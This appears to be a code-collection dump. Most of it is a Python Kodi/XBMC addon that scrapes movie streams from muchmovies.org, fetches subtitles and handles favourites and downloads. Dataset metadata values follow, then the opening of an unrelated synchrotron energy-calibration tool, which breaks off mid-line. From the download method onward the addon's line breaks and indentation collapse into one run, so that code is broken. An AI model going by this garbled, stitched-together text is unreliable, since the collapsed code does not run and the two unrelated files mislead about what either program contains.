            quality = ['bluray', 'brrip', 'bdrip', 'dvdrip', 'hdtv']
            for q in quality: subtitles += re.compile(match % q).findall(result)
            if subtitles == []: raise Exception()
            for subtitle in subtitles:
                url = 'http://www.findsubtitles.eu/getp.php?id=' + subtitle
                response = urllib.urlopen(url)
                content = response.read()
                response.close()
                if content[:4] == 'PK': break
            file = open(sub_file, 'wb')
            file.write(content)
            file.close()
            file = zipfile.ZipFile(sub_file, 'r')
            file.extractall(sub_tmp)
            file.close()
            files = os.listdir(sub_tmp2)
            if files == []: raise Exception()
            file = [i for i in files if i.endswith('.srt') or i.endswith('.sub')]
            if file == []:
                pack = [i for i in files if i.endswith('.zip') or i.endswith('.rar')]
                pack = os.path.join(sub_tmp2, pack[0])
                xbmc.executebuiltin('Extract("%s","%s")' % (pack, sub_tmp2))
                time.sleep(1)
                files = os.listdir(sub_tmp2)
            file = [i for i in files if i.endswith('.srt') or i.endswith('.sub')][0]
            copy = os.path.join(sub_tmp2, file)
            shutil.copy(copy, sub_stream)
            try: shutil.rmtree(sub_tmp)
            except: pass
            file = os.path.join(sub_stream, file)
            if not os.path.isfile(file): raise Exception()
            xbmc.Player().setSubtitles(file)
        except:
            try: shutil.rmtree(sub_tmp)
            except: pass
            try: shutil.rmtree(sub_stream)
            except: pass
            index().infoDialog(language(30317).encode("utf-8"), name)
            return


class index:
    def infoDialog(self, str, header=addonName):
        try: xbmcgui.Dialog().notification(header, str, addonIcon, 3000, sound=False)
        except: xbmc.executebuiltin("Notification(%s,%s, 3000, %s)" % (header, str, addonIcon))

    def okDialog(self, str1, str2, header=addonName):
        xbmcgui.Dialog().ok(header, str1, str2)

    def selectDialog(self, list, header=addonName):
        select = xbmcgui.Dialog().select(header, list)
        return select

    def yesnoDialog(self, str1, str2, header=addonName):
        answer = xbmcgui.Dialog().yesno(header, str1, str2)
        return answer

    def getProperty(self, str):
        property = xbmcgui.Window(10000).getProperty(str)
        return property

    def setProperty(self, str1, str2):
        xbmcgui.Window(10000).setProperty(str1, str2)

    def clearProperty(self, str):
        xbmcgui.Window(10000).clearProperty(str)

    def addon_status(self, id):
        check = xbmcaddon.Addon(id=id).getAddonInfo("name")
        if not check == addonName: return True

    def container_refresh(self):
        xbmc.executebuiltin("Container.Refresh")

    def container_data(self):
        if not xbmcvfs.exists(dataPath): xbmcvfs.mkdir(dataPath)
        if not xbmcvfs.exists(favData):
            file = xbmcvfs.File(favData, 'w')
            file.write('')
            file.close()
        if not xbmcvfs.exists(viewData):
            file = xbmcvfs.File(viewData, 'w')
            file.write('')
            file.close()

    def container_view(self, content, viewDict):
        try:
            skin = xbmc.getSkinDir()
            file = xbmcvfs.File(viewData)
            read = file.read().replace('\n','')
            file.close()
            view = re.compile('"%s"[|]"%s"[|]"(.+?)"' % (skin, content)).findall(read)[0]
            xbmc.executebuiltin('Container.SetViewMode(%s)' % str(view))
        except:
            try:
                id = str(viewDict[skin])
                xbmc.executebuiltin('Container.SetViewMode(%s)' % id)
            except: pass

    def rootList(self, rootList):
        total = len(rootList)
        for i in rootList:
            try:
                name = language(i['name']).encode("utf-8")
                image = '%s/%s' % (addonArt, i['image'])
                action = i['action']
                u = '%s?action=%s' % (sys.argv[0], action)
                item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
                item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
                item.setProperty("Fanart_Image", addonFanart)
                item.addContextMenuItems([], replaceItems=False)
                xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=True)
            except: pass

    def pageList(self, pageList):
        if pageList == None: return
        total = len(pageList)
        for i in pageList:
            try:
                name, url, image = i['name'], i['url'], i['image']
                sysname, sysurl, sysimage = urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(image)
                u = '%s?action=movies&url=%s' % (sys.argv[0], sysurl)
                item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
                item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
                item.setProperty("Fanart_Image", addonFanart)
                item.addContextMenuItems([], replaceItems=False)
                xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=True)
            except: pass

    def nextList(self, nextList):
        try: next = nextList[0]['next']
        except: return
        if next == '': return
        name, url, image = language(30361).encode("utf-8"), next, addonNext
        sysurl = urllib.quote_plus(url)
        u = '%s?action=movies&url=%s' % (sys.argv[0], sysurl)
        item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
        item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
        item.setProperty("Fanart_Image", addonFanart)
        item.addContextMenuItems([], replaceItems=False)
        xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,isFolder=True)

    def downloadList(self):
        u = getSetting("downloads")
        if u == '': return
        name, image = language(30363).encode("utf-8"), addonDownloads
        item = xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=image)
        item.setInfo( type="Video", infoLabels={ "Label": name, "Title": name, "Plot": addonDesc } )
        item.setProperty("Fanart_Image", addonFanart)
        item.addContextMenuItems([], replaceItems=False)
        xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,isFolder=True)

    def movieList(self, movieList):
        if movieList == None: return
        file = xbmcvfs.File(favData)
        favRead = file.read()
        file.close()
        total = len(movieList)
        for i in movieList:
            try:
                name, url, image, title, year, imdb, genre, plot = i['name'], i['url'], i['image'], i['title'], i['year'], i['imdb'], i['genre'], i['plot']
                if plot == '': plot = addonDesc
                if genre == '': genre = ' '
                sysname, sysurl, sysimage, systitle, sysimdb = urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(image), urllib.quote_plus(title), urllib.quote_plus(imdb)
                u = '%s?action=play&name=%s&url=%s&t=%s' % (sys.argv[0], sysname, sysurl, datetime.datetime.now().strftime("%Y%m%d%H%M%S%f"))
                if getSetting("meta") == 'true':
                    meta = metaget.get_meta('movie', title ,year=year)
                    playcountMenu = language(30407).encode("utf-8")
                    if meta['overlay'] == 6: playcountMenu = language(30408).encode("utf-8")
                    metaimdb = urllib.quote_plus(re.sub("[^0-9]", "", meta['imdb_id']))
                    trailer, poster = urllib.quote_plus(meta['trailer_url']), meta['cover_url']
                    if trailer == '': trailer = sysurl
                    if poster == '': poster = image
                else:
                    meta = {'label': title, 'title': title, 'year': year, 'imdb_id' : imdb, 'genre' : genre, 'plot': plot}
                    trailer, poster = sysurl, image
                if getSetting("meta") == 'true' and getSetting("fanart") == 'true':
                    fanart = meta['backdrop_url']
                    if fanart == '': fanart = addonFanart
                else:
                    fanart = addonFanart
                cm = []
                cm.append((language(30405).encode("utf-8"), 'RunPlugin(%s?action=item_queue)' % (sys.argv[0])))
                cm.append((language(30406).encode("utf-8"), 'RunPlugin(%s?action=download&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
                cm.append((language(30412).encode("utf-8"), 'Action(Info)'))
                if action == 'movies_favourites':
                    if not getSetting("fav_sort") == '2': cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer)))
                    if getSetting("meta") == 'true': cm.append((language(30415).encode("utf-8"), 'RunPlugin(%s?action=metadata_movies&name=%s&url=%s&imdb=%s)' % (sys.argv[0], systitle, sysurl, metaimdb)))
                    if getSetting("meta") == 'true': cm.append((playcountMenu, 'RunPlugin(%s?action=playcount_movies&imdb=%s)' % (sys.argv[0], metaimdb)))
                    cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
                    cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0])))
                    if getSetting("fav_sort") == '2': cm.append((language(30419).encode("utf-8"), 'RunPlugin(%s?action=favourite_moveUp&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
                    if getSetting("fav_sort") == '2': cm.append((language(30420).encode("utf-8"), 'RunPlugin(%s?action=favourite_moveDown&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
                    cm.append((language(30421).encode("utf-8"), 'RunPlugin(%s?action=favourite_delete&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
                elif action == 'movies_search':
                    cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer)))
                    cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
                    cm.append((language(30417).encode("utf-8"), 'RunPlugin(%s?action=favourite_from_search&name=%s&imdb=%s&url=%s&image=%s)' % (sys.argv[0], sysname, sysimdb, sysurl, sysimage)))
                    cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0])))
                    cm.append((language(30409).encode("utf-8"), 'RunPlugin(%s?action=settings_open)' % (sys.argv[0])))
                    cm.append((language(30410).encode("utf-8"), 'RunPlugin(%s?action=playlist_open)' % (sys.argv[0])))
                    cm.append((language(30411).encode("utf-8"), 'RunPlugin(%s?action=addon_home)' % (sys.argv[0])))
                else:
                    cm.append((language(30416).encode("utf-8"), 'RunPlugin(%s?action=trailer&name=%s&url=%s)' % (sys.argv[0], sysname, trailer)))
                    if getSetting("meta") == 'true': cm.append((language(30415).encode("utf-8"), 'RunPlugin(%s?action=metadata_movies2&name=%s&url=%s&imdb=%s)' % (sys.argv[0], systitle, sysurl, metaimdb)))
                    cm.append((language(30422).encode("utf-8"), 'RunPlugin(%s?action=library&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
                    if not '"%s"' % url in favRead:
                        cm.append((language(30417).encode("utf-8"), 'RunPlugin(%s?action=favourite_add&name=%s&imdb=%s&url=%s&image=%s)' % (sys.argv[0], sysname, sysimdb, sysurl, sysimage)))
                    else:
                        cm.append((language(30418).encode("utf-8"), 'RunPlugin(%s?action=favourite_delete&name=%s&url=%s)' % (sys.argv[0], sysname, sysurl)))
                    cm.append((language(30428).encode("utf-8"), 'RunPlugin(%s?action=view_movies)' % (sys.argv[0])))
                    cm.append((language(30410).encode("utf-8"), 'RunPlugin(%s?action=playlist_open)' % (sys.argv[0])))
                    cm.append((language(30411).encode("utf-8"), 'RunPlugin(%s?action=addon_home)' % (sys.argv[0])))
                item = xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=poster)
                item.setInfo( type="Video", infoLabels = meta )
                item.setProperty("IsPlayable", "true")
                item.setProperty("Video", "true")
                item.setProperty("art(poster)", poster)
                item.setProperty("Fanart_Image", fanart)
                item.addContextMenuItems(cm, replaceItems=True)
                xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=item,totalItems=total,isFolder=False)
            except: pass


class contextMenu:
    def item_play(self):
        playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
        playlist.clear()
        xbmc.executebuiltin('Action(Queue)')
        playlist.unshuffle()
        xbmc.Player().play(playlist)

    def item_random_play(self):
        playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
        playlist.clear()
        xbmc.executebuiltin('Action(Queue)')
        playlist.shuffle()
        xbmc.Player().play(playlist)

    def item_queue(self):
        xbmc.executebuiltin('Action(Queue)')

    def playlist_open(self):
        xbmc.executebuiltin('ActivateWindow(VideoPlaylist)')

    def settings_open(self):
        xbmc.executebuiltin('Addon.OpenSettings(%s)' % (addonId))

    def addon_home(self):
        xbmc.executebuiltin('Container.Update(plugin://%s/,replace)' % (addonId))

    def view(self, content):
        try:
            skin = xbmc.getSkinDir()
            if xbmcvfs.exists(xbmc.translatePath('special://xbmc/addons/%s/addon.xml' % (skin))):
                xml = xbmc.translatePath('special://xbmc/addons/%s/addon.xml' % (skin))
            elif xbmcvfs.exists(xbmc.translatePath('special://home/addons/%s/addon.xml' % (skin))):
                xml = xbmc.translatePath('special://home/addons/%s/addon.xml' % (skin))
            else: return
            file = xbmcvfs.File(xml)
            read = file.read().replace('\n','')
            file.close()
            src = os.path.dirname(xml) + '/'
            try: src += re.compile('defaultresolution="(.+?)"').findall(read)[0] + '/'
            except: src += re.compile('<res.+?folder="(.+?)"').findall(read)[0] + '/'
            src += 'MyVideoNav.xml'
            file = xbmcvfs.File(src)
            read = file.read().replace('\n','')
            file.close()
            views = re.compile('<views>(.+?)</views>').findall(read)[0]
            views = [int(x) for x in views.split(',')]
            for view in views:
                label = xbmc.getInfoLabel('Control.GetLabel(%s)' % (view))
                if not (label == '' or label is None): break
            file = xbmcvfs.File(viewData)
            read = file.read()
            file.close()
            file = open(viewData, 'w')
            for line in re.compile('(".+?\n)').findall(read):
                if not line.startswith('"%s"|"%s"|"' % (skin, content)): file.write(line)
            file.write('"%s"|"%s"|"%s"\n' % (skin, content, str(view)))
            file.close()
            viewName = xbmc.getInfoLabel('Container.Viewmode')
            index().infoDialog('%s%s%s' % (language(30301).encode("utf-8"), viewName, language(30302).encode("utf-8")))
        except: return

    def favourite_add(self, data, name, url, image, imdb):
        try:
            index().container_refresh()
            file = open(data, 'a+')
            file.write('"%s"|"%s"|"%s"\n' % (name, url, image))
            file.close()
            index().infoDialog(language(30303).encode("utf-8"), name)
        except: return

    def favourite_from_search(self, data, name, url, image, imdb):
        try:
            file = xbmcvfs.File(data)
            read = file.read()
            file.close()
            if url in read:
                index().infoDialog(language(30307).encode("utf-8"), name)
                return
            file = open(data, 'a+')
            file.write('"%s"|"%s"|"%s"\n' % (name, url, image))
            file.close()
            index().infoDialog(language(30303).encode("utf-8"), name)
        except: return

    def favourite_delete(self, data, name, url):
        try:
            index().container_refresh()
            file = xbmcvfs.File(data)
            read = file.read()
            file.close()
            line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0]
            list = re.compile('(".+?\n)').findall(read.replace(line, ''))
            file = open(data, 'w')
            for line in list: file.write(line)
            file.close()
            index().infoDialog(language(30304).encode("utf-8"), name)
        except: return

    def favourite_moveUp(self, data, name, url):
        try:
            index().container_refresh()
            file = xbmcvfs.File(data)
            read = file.read()
            file.close()
            list = re.compile('(".+?)\n').findall(read)
            line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0]
            i = list.index(line)
            if i == 0 : return
            list[i], list[i-1] = list[i-1], list[i]
            file = open(data, 'w')
            for line in list: file.write('%s\n' % (line))
            file.close()
            index().infoDialog(language(30305).encode("utf-8"), name)
        except: return

    def favourite_moveDown(self, data, name, url):
        try:
            index().container_refresh()
            file = xbmcvfs.File(data)
            read = file.read()
            file.close()
            list = re.compile('(".+?)\n').findall(read)
            line = [x for x in re.compile('(".+?)\n').findall(read) if '"%s"' % url in x][0]
            i = list.index(line)
            if i+1 == len(list): return
            list[i], list[i+1] = list[i+1], list[i]
            file = open(data, 'w')
            for line in list: file.write('%s\n' % (line))
            file.close()
            index().infoDialog(language(30306).encode("utf-8"), name)
        except: return

    def metadata(self, content, name, url, imdb, season, episode):
        try:
            if content == 'movie' or content == 'tvshow':
                metaget.update_meta(content, '', imdb, year='')
                index().container_refresh()
            elif content == 'season':
                metaget.update_episode_meta('', imdb, season, episode)
                index().container_refresh()
            elif content == 'episode':
                metaget.update_season('', imdb, season)
                index().container_refresh()
        except: return

    def playcount(self, content, imdb, season, episode):
        try:
            metaget.change_watched(content, '', imdb, season=season, episode=episode, year='', watched='')
            index().container_refresh()
        except: return

    def library(self, name, url, silent=False):
        try:
            library = xbmc.translatePath(getSetting("movie_library"))
            sysname, sysurl = urllib.quote_plus(name), urllib.quote_plus(url)
            content = '%s?action=play&name=%s&url=%s' % (sys.argv[0], sysname, sysurl)
            enc_name = name.translate(None, '\/:*?"<>|')
            folder = os.path.join(library, enc_name)
            stream = os.path.join(folder, enc_name + '.strm')
            xbmcvfs.mkdir(dataPath)
            xbmcvfs.mkdir(library)
            xbmcvfs.mkdir(folder)
            file = xbmcvfs.File(stream, 'w')
            file.write(content)
            file.close()
            if silent == False: index().infoDialog(language(30311).encode("utf-8"), name)
        except: return

    def download(self, name, url):
        try:
            property = (addonName+name)+'download'
            download = xbmc.translatePath(getSetting("downloads"))
            enc_name = name.translate(None, '\/:*?"<>|')
            xbmcvfs.mkdir(dataPath)
            xbmcvfs.mkdir(download)
            file = [i for i in xbmcvfs.listdir(download)[1] if i.startswith(enc_name + '.')]
            if not file == []: file = os.path.join(download, file[0])
            else: file = None
            if download == '':
                yes = index().yesnoDialog(language(30341).encode("utf-8"), language(30342).encode("utf-8"))
                if yes: contextMenu().settings_open()
                return
            if file is None: pass
            elif not file.endswith('.tmp'):
index().yesnoDialog(language(30343).encode("utf-8"), language(30344).encode("utf-8"), name) if yes: xbmcvfs.delete(file) else: return elif file.endswith('.tmp'): if index().getProperty(property) == 'open': yes = index().yesnoDialog(language(30345).encode("utf-8"), language(30346).encode("utf-8"), name) if yes: index().setProperty(property, 'cancel') return else: xbmcvfs.delete(file) url = resolver().run(url, name, download=True) if url is None: return ext = url.rsplit('/', 1)[-1].rsplit('?', 1)[0].rsplit('|', 1)[0].strip().lower() ext = os.path.splitext(ext)[1][1:] stream = os.path.join(download, enc_name + '.' + ext) temp = stream + '.tmp' count = 0 CHUNK = 16 * 1024 request = urllib2.Request(url) request.add_header('User-Agent', 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/6531.22.7') request.add_header('Cookie', 'video=true') #add cookie response = urllib2.urlopen(request, timeout=10) size = response.info()["Content-Length"] file = xbmcvfs.File(temp, 'w') index().setProperty(property, 'open') index().infoDialog(language(30308).encode("utf-8"), name) while True: chunk = response.read(CHUNK) if not chunk: break if index().getProperty(property) == 'cancel': raise Exception() if xbmc.abortRequested == True: raise Exception() part = xbmcvfs.File(temp) quota = int(100 * float(part.size())/float(size)) part.close() if not count == quota and count in [0,10,20,30,40,50,60,70,80,90]: index().infoDialog(language(30309).encode("utf-8") + str(count) + '%', name) file.write(chunk) count = quota response.close() file.close() index().clearProperty(property) xbmcvfs.rename(temp, stream) index().infoDialog(language(30310).encode("utf-8"), name) except: file.close() index().clearProperty(property) xbmcvfs.delete(temp) sys.exit() return def trailer(self, name, url): url = resolver().trailer(name, url) if url is None: return item = xbmcgui.ListItem(path=url) item.setProperty("IsPlayable", "true") xbmc.Player(xbmc.PLAYER_CORE_AUTO).play(url, item) class favourites: def __init__(self): self.list = [] def movies(self): file = xbmcvfs.File(favData) read = file.read() file.close() match = re.compile('"(.+?)"[|]"(.+?)"[|]"(.+?)"').findall(read) for name, url, image in match: try: year = re.compile('[(](\d{4})[)]').findall(name)[-1] except: year = '0' title = name.replace('(%s)' % year, '').strip() self.list.append({'name': name, 'url': url, 'image': image, 'title': title, 'year': year, 'imdb': '0', 'genre': '', 'plot': ''}) if getSetting("fav_sort") == '0': self.list = sorted(self.list, key=itemgetter('title')) elif getSetting("fav_sort") == '1': self.list = sorted(self.list, key=itemgetter('title'))[::-1] self.list = sorted(self.list, key=itemgetter('year'))[::-1] index().movieList(self.list) class root: def get(self): rootList = [] rootList.append({'name': 30501, 'image': 'Title.png', 'action': 'movies_title'}) rootList.append({'name': 30502, 'image': 'Release.png', 'action': 'movies_release'}) rootList.append({'name': 30503, 'image': 'Added.png', 'action': 'movies_added'}) rootList.append({'name': 30504, 'image': 'Rating.png', 'action': 'movies_rating'}) rootList.append({'name': 30505, 'image': 'Pages.png', 'action': 'pages_movies'}) rootList.append({'name': 30506, 'image': 'Genres.png', 'action': 'genres_movies'}) rootList.append({'name': 30507, 'image': 'Favourites.png', 'action': 'movies_favourites'}) rootList.append({'name': 30508, 'image': 'Search.png', 'action': 'movies_search'}) index().rootList(rootList) 
index().downloadList() class link: def __init__(self): self.muchmovies_base = 'http://www.muchmovies.org' self.muchmovies_sort = 'http://www.muchmovies.org/session/sort' self.muchmovies_title = 'http://www.muchmovies.org/movies?sort_by=title' self.muchmovies_release = 'http://www.muchmovies.org/movies?sort_by=release' self.muchmovies_added = 'http://www.muchmovies.org/movies?sort_by=date_added' self.muchmovies_rating = 'http://www.muchmovies.org/movies?sort_by=rating' self.muchmovies_root = 'http://www.muchmovies.org/movies' self.muchmovies_search = 'http://www.muchmovies.org/search' self.muchmovies_genre = 'http://www.muchmovies.org/genres' self.youtube_base = 'http://www.youtube.com' self.youtube_search = 'http://gdata.youtube.com/feeds/api/videos?q=' self.youtube_watch = 'http://www.youtube.com/watch?v=%s' self.youtube_info = 'http://gdata.youtube.com/feeds/api/videos/%s?v=2' class pages: def __init__(self): self.list = [] def muchmovies(self): self.list = self.muchmovies_list() index().pageList(self.list) def muchmovies_list(self): try: result = getUrl(link().muchmovies_root, mobile=True).result pages = common.parseDOM(result, "div", attrs = { "class": "pagenav" })[0] pages = re.compile('(<option.+?</option>)').findall(pages) except: return for page in pages: try: name = common.parseDOM(page, "option")[0] name = common.replaceHTMLCodes(name) name = name.encode('utf-8') url = common.parseDOM(page, "option", ret="value")[0] url = '%s%s?sort_by=title' % (link().muchmovies_base, url) url = common.replaceHTMLCodes(url) url = url.encode('utf-8') image = addonPages.encode('utf-8') self.list.append({'name': name, 'url': url, 'image': image}) except: pass return self.list class genres: def __init__(self): self.list = [] def muchmovies(self): self.list = self.muchmovies_list() index().pageList(self.list) def muchmovies_list(self): try: result = getUrl(link().muchmovies_genre, mobile=True).result genres = common.parseDOM(result, "ul", attrs = { "id": "genres" }) genres = common.parseDOM(genres, "li") except: return for genre in genres: try: name = common.parseDOM(genre, "h2")[0] name = common.replaceHTMLCodes(name) name = name.encode('utf-8') url = common.parseDOM(genre, "a", ret="href")[0] url = '%s%s?sort_by=release' % (link().muchmovies_base, url) url = common.replaceHTMLCodes(url) url = url.encode('utf-8') image = common.parseDOM(genre, "img", ret="src")[0] image = '%s%s' % (link().muchmovies_base, image) image = common.replaceHTMLCodes(image) image = image.encode('utf-8') self.list.append({'name': name, 'url': url, 'image': image}) except: pass return self.list class movies: def __init__(self): self.list = [] self.data = [] def muchmovies(self, url): self.list = self.muchmovies_list(url) index().movieList(self.list) index().nextList(self.list) def muchmovies_title(self): self.list = self.muchmovies_list(link().muchmovies_title) index().movieList(self.list) index().nextList(self.list) def muchmovies_release(self): self.list = self.muchmovies_list(link().muchmovies_release) index().movieList(self.list) index().nextList(self.list) def muchmovies_added(self): self.list = self.muchmovies_list(link().muchmovies_added) index().movieList(self.list) index().nextList(self.list) def muchmovies_rating(self): self.list = self.muchmovies_list(link().muchmovies_rating) index().movieList(self.list) index().nextList(self.list) def muchmovies_search(self, query=None): if query is None: self.query = common.getUserInput(language(30362).encode("utf-8"), '') else: self.query = query if not (self.query is None or 
self.query == ''): self.query = link().muchmovies_search + '/' + urllib.quote_plus(self.query.replace(' ', '-')) self.list = self.muchmovies_list(self.query) index().movieList(self.list) index().nextList(self.list) def muchmovies_list(self, url): try: post = url.split('?')[-1] result = getUrl(link().muchmovies_sort, post=post, mobile=True, close=False, cookie=True).result result = getUrl(url, mobile=True).result movies = common.parseDOM(result, "li", attrs = { "data-icon": "false" }) except: return try: try: next = common.parseDOM(result, "a", ret="href", attrs = { "data-icon": "arrow-r", "class": "ui-disabled" })[0] next = '' except: next = common.parseDOM(result, "a", ret="href", attrs = { "data-icon": "arrow-r" })[0] next = '%s%s?%s' % (link().muchmovies_base, next, post) except: next = '' for movie in movies: try: name = common.parseDOM(movie, "h2")[0] name = common.replaceHTMLCodes(name) name = name.encode('utf-8') match = re.findall('(.+?)[(](\d{4})[)]', name)[0] title = match[0].strip() title = common.replaceHTMLCodes(title) title = title.encode('utf-8') year = match[-1].strip() year = re.sub("[^0-9]", "", year) year = year.encode('utf-8') url = common.parseDOM(movie, "a", ret="href")[0] url = '%s%s' % (link().muchmovies_base, url) url = common.replaceHTMLCodes(url) url = url.encode('utf-8') image = common.parseDOM(movie, "img", ret="src")[0] image = common.replaceHTMLCodes(image) image = image.encode('utf-8') self.list.append({'name': name, 'url': url, 'image': image, 'title': title, 'year': year, 'imdb': '0', 'genre': '', 'plot': '', 'next': next}) except: pass return self.list class resolver: def run(self, url, name=None, download=False): try: if player().status() is True: return url = self.muchmovies(url) if url is None: raise Exception() if download == True: return url player().run(name, url) return url except: index().infoDialog(language(30318).encode("utf-8")) return def muchmovies(self, url): try: result = getUrl(url, mobile=True).result url = common.parseDOM(result, "a", ret="href") url = [i for i in url if "?action=stream" in i][0] url = url.split("?")[0] return url except: return def trailer(self, name, url): try: if not url.startswith('http://'): url = link().youtube_watch % url url = self.youtube(url) else: try: result = getUrl(url).result url = re.compile('"http://www.youtube.com/embed/(.+?)"').findall(result)[0] if ' ' in url: raise Exception() url = url.split("?")[0].split("&")[0] url = link().youtube_watch % url url = self.youtube(url) except: url = link().youtube_search + name + ' trailer' url = self.youtube_search(url) if url is None: return return url except: return def youtube_search(self, url): try: if index().addon_status('plugin.video.youtube') is None: index().okDialog(language(30321).encode("utf-8"), language(30322).encode("utf-8")) return query = url.split("?q=")[-1].split("/")[-1].split("?")[0] url = url.replace(query, urllib.quote_plus(query)) result = getUrl(url).result result = common.parseDOM(result, "entry") result = common.parseDOM(result, "id") for url in result[:5]: url = url.split("/")[-1] url = link().youtube_watch % url url = self.youtube(url) if not url is None: return url except: return def youtube(self, url): try: if index().addon_status('plugin.video.youtube') is None: index().okDialog(language(30321).encode("utf-8"), language(30322).encode("utf-8")) return id = url.split("?v=")[-1].split("/")[-1].split("?")[0].split("&")[0] state, reason = None, None result = getUrl(link().youtube_info % id).result try: state = common.parseDOM(result, 
"yt:state", ret="name")[0] reason = common.parseDOM(result, "yt:state", ret="reasonCode")[0] except: pass if state == 'deleted' or state == 'rejected' or state == 'failed' or reason == 'requesterRegion' : return try: result = getUrl(link().youtube_watch % id).result alert = common.parseDOM(result, "div", attrs = { "id": "watch7-notification-area" })[0] return except: pass url = 'plugin://plugin.video.youtube/?action=play_video&videoid=%s' % id return url except: return main()
gpl-2.0
-4,796,895,218,968,150,000
45.186472
868
0.534018
false
3.821722
false
false
false
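# ---------------------------------------------------------------------------
# A minimal, runnable sketch of the chunked-download-with-progress pattern
# used by contextMenu.download in the addon above. Assumptions: Python 3
# (urllib.request instead of the addon's urllib2), the URL/destination names
# are hypothetical, and the server sends a Content-Length header, as the
# addon code also assumes. The 16 KiB chunk size and ~10%-step progress
# reporting mirror the addon.
import urllib.request

def download_with_progress(url, dest, chunk_size=16 * 1024):
    request = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
    response = urllib.request.urlopen(request, timeout=10)
    total = int(response.info()['Content-Length'])
    done, last_decile = 0, -1
    with open(dest, 'wb') as f:
        while True:
            chunk = response.read(chunk_size)
            if not chunk:
                break
            f.write(chunk)
            done += len(chunk)
            decile = (100 * done // total) // 10
            if decile != last_decile:          # report in ~10% steps
                last_decile = decile
                print('downloaded %d%%' % (10 * decile))
    response.close()
# ---------------------------------------------------------------------------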
kkummer/RixsToolBox
RTB_EnergyCalibration.py
1
21352
#!/usr/bin/env python #-*- coding: utf-8 -*- #/*########################################################################## # Copyright (C) 2016 K. Kummer, A. Tamborino, European Synchrotron Radiation # Facility # # This file is part of the ID32 RIXSToolBox developed at the ESRF by the ID32 # staff and the ESRF Software group. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # #############################################################################*/ from __future__ import division __author__ = "K. Kummer - ESRF ID32" __contact__ = "kurt.kummer@esrf.fr" __license__ = "MIT" __copyright__ = "European Synchrotron Radiation Facility, Grenoble, France" ___doc__ = """ ... """ import os import copy import time import numpy as np from PyMca5.PyMcaGui import PyMcaQt as qt from PyMca5.PyMcaGui.pymca import ScanWindow from PyMca5.PyMcaCore.SpecFileDataSource import SpecFileDataSource from PyMca5.PyMcaGui.pymca import QDispatcher from PyMca5.PyMcaGui.pymca.SumRulesTool import MarkerSpinBox from RTB_SpecGen import ExportWidget from RTB_Icons import RtbIcons class MainWindow(qt.QWidget): def __init__(self, parent=None): DEBUG = 1 qt.QWidget.__init__(self, parent) self.setWindowTitle('RixsToolBox - Energy conversion') self.setWindowIcon(qt.QIcon(qt.QPixmap(RtbIcons['Logo']))) self.build() self.connect_signals() self.scansCalibrated = False def build(self): self._sourceWidget = QDispatcher.QDispatcher(self) fileTypeList = ['Spec Files (*.spec)', 'Dat Files (*.dat)', 'All Files (*.*)'] self._sourceWidget.sourceSelector.fileTypeList = fileTypeList for tabnum in range(self._sourceWidget.tabWidget.count()): if self._sourceWidget.tabWidget.tabText(tabnum) != 'SpecFile': self._sourceWidget.tabWidget.removeTab(tabnum) self._sourceWidget.selectorWidget['SpecFile'] self._exportWidget = ExportWidget() self._plotSpectraWindow = 